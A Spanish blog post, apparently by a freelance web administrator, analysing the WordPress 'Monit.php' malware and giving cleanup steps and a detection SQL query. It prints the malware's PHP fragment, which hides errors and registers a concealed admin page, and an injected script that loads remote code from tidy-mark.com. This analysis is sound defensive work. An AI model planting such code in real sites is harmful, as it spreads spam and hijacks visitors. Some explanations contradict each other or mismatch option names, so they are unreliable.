Como administrador de sitios web, me he encontrado en numerosas ocasiones con diversos virus y malware que ponen en riesgo la seguridad de las páginas que administro. Sin embargo, hay un virus en particular que ha sido especialmente persistente y peligroso: el «Software malicioso WordPress Monit.php«.

En este artículo, compartiré mi experiencia y conocimientos sobre este virus y cómo se puede prevenir y solucionar para proteger la seguridad de su sitio web.

Contenido

¿Qué es el malware monit.php?

Monit.php es un archivo que no es parte de WordPress ni es un malware por sí mismo. Sin embargo, los atacantes pueden utilizar el archivo Monit.php para realizar actividades maliciosas en tu sitio web. Por ejemplo, los atacantes pueden insertar el archivo Monit.php en tu sitio y utilizarlo para enviar spam o realizar ataques de fuerza bruta contra tu sitio web. También pueden utilizarlo para enviar información confidencial desde tu sitio a un servidor remoto controlado por los atacantes. Es importante mantener tu sitio web actualizado y utilizar medidas de seguridad adicionales para protegerlo contra ataques cibernéticos.

Código malware monit.php


error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='9f3d4cbd075c63c03c06a63f4579eb13';
$version='1.2';
add_action('admin_menu', function() {
    add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options', 'monit', 'mont_page' );
    remove_submenu_page( 'options-general.php', 'monit' );
});

error_reporting(0);

ini_set('display_errors', 0);

$plugin_key='9f3d4cbd075c63c03c06a63f4579eb13';

$version='1.2';

add_action('admin_menu', function() {

add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options', 'monit', 'mont_page' );

remove_submenu_page( 'options-general.php', 'monit' );

});

Qué hace esta funcion y por que la usan los hakers?

La función que se muestra en el código es utilizada para ocultar los errores del sitio web y desactivar la visualización de los mensajes de error en la pantalla. Es comúnmente utilizado por los hackers para ocultar sus actividades maliciosas en un sitio web y evitar que el propietario del sitio o los usuarios vean los errores o problemas que puedan ocurrir.

La inclusión de una clave de plugin y la eliminación de una página de submenú de la configuración del sitio también sugieren que el código puede estar relacionado con la instalación de un plugin malicioso o una actividad de hacking. En general, cualquier código que intente ocultar información o actividad sospechosa en un sitio web debe ser considerado con precaución y verificado cuidadosamente.

La función establece el nivel de reporte de errores a «0» y deshabilita la visualización de errores en el navegador, lo que ayuda a ocultar cualquier mensaje de error o advertencia que pueda aparecer en la página web.

Luego, la función define una variable «$plugin_key» con un valor específico y otra variable «$version» con un número de versión.

La función también agrega una página de opciones llamada «Monitization» al menú de administración de WordPress utilizando la función «add_options_page«. También elimina la página de opciones «monit» del submenú de «Ajustes generales» utilizando la función «remove_submenu_page«.

En resumen, esta función establece el nivel de reporte de errores a «0», define dos variables y agrega una página de opciones al menú de administración de WordPress.

Al inspeccionar el código del complemento afectado, descubrimos que estaba inyectando la tabla wp_options MySQL con direcciones URL no deseadas y redireccionamientos junto con algunas otras configuraciones. Lo más preocupante de todo es que este malware puede infectar web de distintas bases de datos en el mismo servidor.

Aunque el código de este malware en general es poco convincente, su objetivo es claro: los piratas informáticos intentan aprovechar los sitios de WordPress infectados para promocionar sus campañas de SEO de Black Hat.


<script>
(function(__htas){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/tidy-mark.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script>

(function(__htas){

var d = document,

s = d.createElement('script'),

l = d.scripts[d.scripts.length - 1];

s.settings = __htas || {};

s.src = "\/\/tidy-mark.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";

l.parentNode.insertBefore(s, l);

})({})

</script>

Por eso, es importante estar al tanto de estas amenazas y tomar medidas de seguridad proactivas para evitar su propagación.

Como administradores de sitios web y expertos en seguridad, compartiré nuestra experiencia en el manejo del Software malicioso WordPress Monit.php y discutiremos algunas medidas preventivas que los propietarios de sitios web de WordPress pueden tomar para proteger sus sitios de futuros ataques.

Cómo rastrear y eliminar el virus hack Monit.Php

Para rastrear y eliminar el virus hack Monit.php en tu sitio WordPress, sigue estos pasos:

Escanea tu sitio web en busca de malware utilizando herramientas de seguridad. Estas herramientas te ayudarán a identificar cualquier archivo malicioso, incluyendo Monit.php.
Si se detecta el archivo Monit.php, es recomendable eliminarlo inmediatamente. Puedes hacerlo utilizando un cliente FTP o el administrador de archivos de tu panel de control de hosting.
Revisa los registros de actividad en WordPress para ver si hay entradas sospechosas o inusuales. Si encuentras algo extraño, cámbia tus contraseñas de inicio de sesión y asegúrate de que los usuarios de tu sitio también lo hagan.
Actualiza todo tu sitio WordPress, incluyendo plugins y temas, a la última versión disponible.
Considera agregar medidas de seguridad adicionales a tu sitio, como utilizar plugins de seguridad confiables y mantener copias de seguridad regulares de tu sitio web.

Recuerda que la eliminación del virus Monit.php es solo el primer paso. Es importante tomar medidas adicionales para mantener tu sitio web seguro en el futuro.

Eliminar código de malware de Monit.php en la base de datos

Eliminar el código de malware de Monit.php en la base de datos puede ser un proceso delicado y complicado que requiere conocimientos técnicos avanzados. Es importante realizar una copia de seguridad completa de tu sitio web y de la base de datos antes de intentar cualquier eliminación de malware.

Aquí hay algunos pasos generales que puedes seguir para eliminar el código de malware de Monit.php de la base de datos de tu sitio:

Identifica las tablas de la base de datos que pueden estar infectadas con el malware Monit.php.
Utiliza un cliente de acceso a la base de datos, como phpMyAdmin, para abrir y examinar las tablas infectadas. Busca cualquier entrada que contenga el código malicioso de Monit.php.
Si encuentras una entrada infectada, elimina todo el código malicioso, incluyendo cualquier línea que contenga la cadena «Monit.php». Si no estás seguro de cómo eliminar el código malicioso de la base de datos, considera contratar a un especialista en seguridad de sitios web que pueda ayudarte a eliminar el malware de manera segura.
Después de eliminar el código de malware de Monit.php de la base de datos, asegúrate de actualizar todo tu sitio WordPress, incluyendo plugins y temas, a la última versión disponible y utiliza medidas de seguridad adicionales para proteger tu sitio web contra futuros ataques cibernéticos.

Registros

Los registros que mencionamos a continuación son utilizados por los hackers para insertar código malicioso que se almacenan en la tabla «wp_options» de la base de datos de WordPress. Aquí hay una descripción breve de cada opción:

«default_mont_options»: Se utiliza para almacenar las opciones predeterminadas del plugin «Monitization Plugin» (o «Monit» en el código que compartiste) en WordPress.
«ad_code»: Se utiliza para almacenar el código de anuncios o publicidad que se muestra en el sitio web.
«hide_admin»: Se utiliza para ocultar la opción de «Apariencia» en el menú de administración de WordPress para ciertos roles de usuario.
«hide_logged_in»: Se utiliza para ocultar el contenido del sitio web para los usuarios que han iniciado sesión.
«display_ad»: Se utiliza para determinar si se mostrará el código de anuncios en el sitio web.
«search_engines»: Se utiliza para determinar si se permitirá que los motores de búsqueda indexen el sitio web.
«auto_update»: Se utiliza para determinar si se actualizarán automáticamente los plugins y temas de WordPress.
«ip_admin»: Se utiliza para almacenar la dirección IP del administrador del sitio web.
«cookies_admin»: Se utiliza para almacenar información de cookies del administrador del sitio web.
«log_admin»: Se utiliza para registrar la actividad del administrador en el sitio web.
«log_install»: Se utiliza para registrar la actividad de instalación del plugin o tema en el sitio web.

Puede usar en su phpMyAdmin la siguiente sentencia SQL y encontrar si hay registros inyectados por el malware Monit.


SELECT * FROM wp_options WHERE option_name IN ( 'default_mont_options','ad_code','hide_admin','hide_logged_in','display_ad','search_engines','auto_update','ip_admin','cookies_admin','logged_admin','log_install')

SELECT * FROM wp_options WHERE option_name IN ( 'default_mont_options','ad_code','hide_admin','hide_logged_in','display_ad','search_engines','auto_update','ip_admin','cookies_admin','logged_admin','log_install')

Es importante tener en cuenta que estas opciones pueden variar dependiendo de los plugins y temas instalados en tu sitio web, y que algunas opciones pueden ser específicas de ciertos plugins o temas.

Hay que destacar que el virus «Software malicioso WordPress Monit.php» puede infectar no solo una, sino varias webs alojadas en el mismo servidor. Esto se debe a que el virus puede propagarse a través de diferentes bases de datos, lo que aumenta significativamente el riesgo de infección. Por lo tanto, es fundamental tomar medidas de seguridad proactivas para prevenir la propagación del virus y proteger todas las webs alojadas en su servidor.

Como Freelancer, tengo experiencia en la limpieza de sitios web de WordPress y garantizo un servicio de calidad y resultados efectivos. Si necesita ayuda para limpiar su sitio web de WordPress de malware Monit.php, no dude en contactarme para obtener más información sobre mis servicios. Estoy aquí para ayudar a proteger su sitio web y garantizar su seguridad.